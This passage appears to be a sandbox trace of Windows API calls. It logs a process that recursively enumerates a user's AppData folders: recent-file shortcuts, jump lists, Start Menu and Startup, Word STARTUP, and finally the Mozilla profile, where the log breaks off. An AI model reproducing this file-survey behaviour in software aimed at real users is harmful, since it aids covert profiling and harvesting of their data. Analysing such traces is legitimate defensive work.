lpFindFileData=0x18d4d0) returned 0x586be0 [0083.552] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.552] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low" [0083.552] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*" [0083.552] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.552] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.552] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.552] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.552] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Recent" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent" [0083.552] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*" [0083.552] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.552] PathMatchSpecW (pszFile="-30A.lnk", pszSpec="*") returned 1 [0083.552] PathMatchSpecW (pszFile="-K1l.lnk", pszSpec="*") returned 1 [0083.552] PathMatchSpecW (pszFile="-m__HyY.flv.lnk", pszSpec="*") returned 1 [0083.552] PathMatchSpecW (pszFile="0bDrkJM8XXXnFRxfDg.lnk", pszSpec="*") returned 1 [0083.552] PathMatchSpecW (pszFile="0DNjPat.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="2Nixhtrz2gmyV.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="2w0hahW-zduMFuM.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="3iTBagJh1TzGAF.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="3why64Tae9g8c4VdM8du.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="4GnnIG6RdLOiij.mkv.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="4K6vEar.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="4QH68b0VZVmVea.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="4zHejp QLa ZE2pa cH.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="5mCV5OJINb0by_M.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="66JSU-GMFXebztL6ygQU.mkv.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="6s KHOwEGy9S7Ui.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="6ZmZ0xKozu28.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="6zu4TtZ9V.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="7BO3.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="7HjWJR_LGMvzxmbh11.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="8bX-DpXHK5F2Jt08OT.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="8DKSg5L.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="8IX078BF_yA.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="8W9SovSulzKgG_lNSllO.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="9rKKEdWHzAr2h.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="9sVjW_9SxQBpOlFRynwd.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="9XjB ynfFlmJrlu8uy.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="A2W4hWIo9JNOPgMLEbON.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="A3eTpG3yiuj.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="Ab9hH.mkv.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="AmGzCyfE3UJ.lnk", pszSpec="*") returned 1 [0083.553] PathMatchSpecW (pszFile="AtpEIf_3ro-.lnk", pszSpec="*") returned 1 [0083.553] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="AutomaticDestinations" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations" [0083.553] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" [0083.553] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.554] PathMatchSpecW (pszFile="1b4dd67f29cb1962.automaticDestinations-ms", pszSpec="*") returned 1 [0083.554] PathMatchSpecW (pszFile="7e4dca80246863e3.automaticDestinations-ms", pszSpec="*") returned 1 [0083.554] PathMatchSpecW (pszFile="9b9cdc69c1c24e2b.automaticDestinations-ms", pszSpec="*") returned 1 [0083.554] PathMatchSpecW (pszFile="eb282ead62b4db87.automaticDestinations-ms", pszSpec="*") returned 1 [0083.554] PathMatchSpecW (pszFile="fb3b0dbfee58fac8.automaticDestinations-ms", pszSpec="*") returned 1 [0083.554] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.554] PathMatchSpecW (pszFile="B4honwPP90ft9NBJsJ.flv.lnk", pszSpec="*") returned 1 [0083.554] PathMatchSpecW (pszFile="BDa5B4GVrREPMxye24.lnk", pszSpec="*") returned 1 [0083.555] PathMatchSpecW (pszFile="BQbMQWsA.lnk", pszSpec="*") returned 1 [0083.555] PathMatchSpecW (pszFile="bwFwGum5_tu.lnk", pszSpec="*") returned 1 [0083.555] PathMatchSpecW (pszFile="cDuwllOG1a13fdUSRtyT.lnk", pszSpec="*") returned 1 [0083.555] PathMatchSpecW (pszFile="CJ3VRj.lnk", pszSpec="*") returned 1 [0083.555] PathMatchSpecW (pszFile="CNyryAkAB.lnk", pszSpec="*") returned 1 [0083.555] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent", pszFile="CustomDestinations" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations" [0083.555] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" [0083.555] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.555] PathMatchSpecW (pszFile="1b4dd67f29cb1962.customDestinations-ms", pszSpec="*") returned 1 [0083.555] PathMatchSpecW (pszFile="590aee7bdd69b59b.customDestinations-ms", pszSpec="*") returned 1 [0083.555] PathMatchSpecW (pszFile="5afe4de1b92fc382.customDestinations-ms", pszSpec="*") returned 1 [0083.555] PathMatchSpecW (pszFile="7e4dca80246863e3.customDestinations-ms", pszSpec="*") returned 1 [0083.555] PathMatchSpecW (pszFile="969252ce11249fdd.customDestinations-ms", pszSpec="*") returned 1 [0083.555] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.556] PathMatchSpecW (pszFile="Cwm2k.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="Ea27DuZ.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="eo9uwSYwbQ8w-H9nZNH.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="f9Kz7FajrZe1D3cJu.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="f9qMY.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="fekn9-cYjXE.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="fI8HtTYnLk.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="fvW2_oNzD WbqiCr-MPh.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="fWYvTfhZ8pDF fugPxx.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="fyH-uEyk.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="GerI56Fqfwp_.mkv.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="GfolyaPf5e_.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="GniRADlcdXM4e2NV8Q9.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="gSeMslrV-UMnw.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="GWgVhSNyFu dKu.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="gXiF8Ie492m0IXBb.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="hW8kL.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="HxDmDA2.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="i5O0_LIU2IZEasfZ7kGw.ots.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="IjwM7q33.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="iOIPdOtfzh B E9C.mkv.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="ItqxY4z Y 4rVAHIrmZY.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="jzyu_DZ Ndc.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="k-_w4gLllVwoL83pf.lnk", pszSpec="*") returned 1 [0083.556] PathMatchSpecW (pszFile="k9t4FeIHN.lnk", pszSpec="*") returned 1 [0083.557] PathMatchSpecW (pszFile="kAq1- 39jYRD61eR-q W.lnk", pszSpec="*") returned 1 [0083.557] PathMatchSpecW (pszFile="kBFP3Db2Q.lnk", pszSpec="*") returned 1 [0083.557] PathMatchSpecW (pszFile="L s6Njtmvi.lnk", pszSpec="*") returned 1 [0083.557] PathMatchSpecW (pszFile="LmPLyJ2Ow.lnk", pszSpec="*") returned 1 [0083.557] PathMatchSpecW (pszFile="m3h5tfwIa0qf.lnk", pszSpec="*") returned 1 [0083.557] PathMatchSpecW (pszFile="mctbo0q.flv.lnk", pszSpec="*") returned 1 [0083.557] PathMatchSpecW (pszFile="Me7y1usyGmJu.flv.lnk", pszSpec="*") returned 1 [0083.557] PathMatchSpecW (pszFile="MexIfyKM-sbW8O.lnk", pszSpec="*") returned 1 [0083.557] PathMatchSpecW (pszFile="mtkGNF4Nxp1Jq.lnk", pszSpec="*") returned 1 [0083.557] PathMatchSpecW (pszFile="My Music.lnk", pszSpec="*") returned 1 [0083.557] PathMatchSpecW (pszFile="My Pictures.lnk", pszSpec="*") returned 1 [0083.557] PathMatchSpecW (pszFile="My Videos.lnk", pszSpec="*") returned 1 [0083.557] PathMatchSpecW (pszFile="NDKwV1zojdnIvD.lnk", pszSpec="*") returned 1 [0083.557] PathMatchSpecW (pszFile="OxDXUrN_NRgHCzwB.lnk", pszSpec="*") returned 1 [0083.557] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.557] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="SendTo" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo" [0083.557] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*" [0083.557] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.558] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.558] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Start Menu" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu" [0083.558] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*" [0083.558] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.558] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu", pszFile="Programs" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs" [0083.558] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*" [0083.558] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.558] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Accessories" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories" [0083.558] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*" [0083.558] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.558] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", pszFile="Accessibility" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility" [0083.558] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*" [0083.558] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.559] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.559] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", pszFile="System Tools" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools" [0083.559] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*" [0083.559] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.560] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.560] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.560] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Administrative Tools" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools" [0083.560] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*" [0083.560] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.560] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.561] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Maintenance" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance" [0083.561] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*" [0083.561] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.561] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.561] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs", pszFile="Startup" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" [0083.561] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*" [0083.561] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.561] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.561] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.561] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.561] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Templates" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates" [0083.561] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*" [0083.561] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.561] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.561] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows", pszFile="Themes" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes" [0083.561] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*" [0083.561] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.561] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.562] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.562] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Word" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word" [0083.562] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\*" [0083.562] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.562] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word", pszFile="STARTUP" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" [0083.562] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*" [0083.562] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.562] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.562] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.562] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.562] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Mozilla" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla" [0083.562] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*" [0083.562] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\*", 